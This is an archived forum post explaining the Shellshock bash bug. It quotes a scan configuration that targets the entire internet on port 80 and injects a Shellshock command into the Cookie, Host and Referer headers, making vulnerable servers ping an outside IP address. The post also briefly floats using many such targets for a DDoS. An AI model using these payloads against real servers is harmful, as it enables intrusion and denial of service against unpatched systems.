This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - SubjectZero

Pages: [1]
1
This article has a nice example of exploiting this bug:

http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

By creating a HTTP request like this:

Code: [Select]
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

The attacker is able to (in this situation) have the target ping a specific IP. Imagine many targets doing this simultaneously to perform a DDOS attack as seen in the post below:
http://www.mirror.co.uk/news/technology-science/technology/shellshock-bug-first-malware-exploit-4323080

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.